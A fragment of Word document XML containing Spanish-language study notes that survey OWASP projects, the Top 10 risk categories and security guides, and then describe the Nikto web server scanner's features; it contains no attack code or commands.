    <w:p w14:paraId="4220E4F2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Dependency-Check</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Escáner de dependencias vulnerables en proyectos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FBFA00" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:t>: WAF (Web Application Firewall) de código abierto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B27C90" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP Juice Shop</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Aplicación vulnerable para prácticas de hacking ético.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35615A63" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="21"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Amass</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Herramienta de descubrimiento de superficies de ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D549AD" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="00B52F07" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2. OWASP Top 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B785726" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>La lista más reconocida de vulnerabilidades críticas en aplicaciones web, actualizada periódicamente (última versión: </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:t>Incluye riesgos como:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B43CD2" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Inyección SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E3368" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cross-Site Scripting (XSS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555704EE" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Configuraciones de seguridad incorrectas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06650ABC" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Componentes con vulnerabilidades conocidas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5993D4" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Guías y estándares de seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20891B70" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP ASVS (Application Security Verification Standard)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Marco para verificar la seguridad de aplicaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EE4F0F" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP Cheat Sheets</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Guías rápidas sobre temas como autenticación, CORS, CSRF, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5BD534" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP Testing Guide</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Metodología para pruebas de penetración.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410F152A" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Comunidad global y eventos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AABCDF6" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Conferencias (AppSec Days, Global AppSec)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Eventos para compartir conocimiento en ciberseguridad.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09512D" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Capítulos locales</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Grupos en diferentes países que organizan meetups y talleres.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7BFA18" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5. Educación y capacitación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B366740" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>OWASP WebGoat</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Aplicación vulnerable para aprender a explotar y corregir fallos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3123D7E5" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OWASP SKF (Security Knowledge Framework)</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:t>: Plataforma educativa para desarrolladores.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E3745" w14:textId="77777777" w:rsidR="0030013F" w:rsidRPr="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Investigación y herramientas gratuitas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3B2C0E" w14:textId="47EEB4A9" w:rsidR="0030013F" w:rsidRDefault="0030013F" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Todos los recursos de OWASP son </w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>open-source y gratuitos</w:t>
      </w:r>
      <w:r w:rsidRPr="0030013F">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, lo que facilita el acceso a la seguridad para startups, empresas y gobiernos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B959D60" w14:textId="25C32785" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ACFE345" w14:textId="244EB29F" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A274E75" w14:textId="50F9D065" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABC9021" w14:textId="4EF208DF" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="364B2668" w14:textId="7C0D43FC" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F62371" w14:textId="34BA7A7F" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="0030013F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A000FCA" w14:textId="7A155674" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:ind w:left="432" w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>NIKTO: ESCÁNER DE VULNERABILIDADES EN SERVIDORES WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A8AA8" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> es una herramienta </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>open-source</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> de escaneo de vulnerabilidades en servidores web, diseñada para identificar problemas de seguridad, configuraciones incorrectas y software obsoleto. Es ampliamente utilizada por </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>pentesters, administradores de sistemas y auditores de seguridad</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> para evaluar rápidamente la seguridad de un sitio web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05561372" w14:textId="1FA2A19E" w:rsidR="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A diferencia de herramientas como </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ZAP</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> (más orientada a aplicaciones web) o </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>JMeter</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> (enfocada en rendimiento), Nikto se especializa en </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>escaneo rápido y automatizado de servidores</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, detectando vulnerabilidades conocidas en servicios como Apache, Nginx, IIS y otros</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58365D6F" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Características principales de Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AB45EA" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Escaneo rápido y automatizado</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA5ECA4" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Detecta </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>más de 6,700 vulnerabilidades y problemas conocidos</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t> en servidores web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0173FFC3" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Evalúa configuraciones inseguras, archivos expuestos y versiones vulnerables de software.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A278772" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Soporte para múltiples servidores web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398415AE" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Compatible con </w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Apache, Nginx, IIS, Tomcat y otros</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B407D6B" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Identifica servidores mal configurados y servicios innecesarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1418371C" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Detección de problemas comunes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0006DA5C" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Archivos y directorios peligrosos (ej: /admin, /backup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F39CD8" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Software desactualizado (ej: versiones antiguas de PHP, WordPress, plugins).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D4BE66" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Configuraciones inseguras (ej: métodos HTTP peligrosos como PUT o DELETE).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11990B73" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="43"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Cabeceras HTTP vulnerables y falta de hardening.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3758FDB0" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="000E6292">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Personalización y flexibilidad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C092AA4" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Modo de evasión</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Opciones para evitar detección por WAFs (Web Application Firewalls).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36B5D063" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Plugin system</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: Permite extender sus capacidades con scripts personalizados.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780834B6" w14:textId="77777777" w:rsidR="00B52F07" w:rsidRPr="00B52F07" w:rsidRDefault="00B52F07" w:rsidP="00B52F07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="44"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Escaneo con autenticación</w:t>
      </w:r>
      <w:r w:rsidRPr="00B52F07">
        <w:rPr>
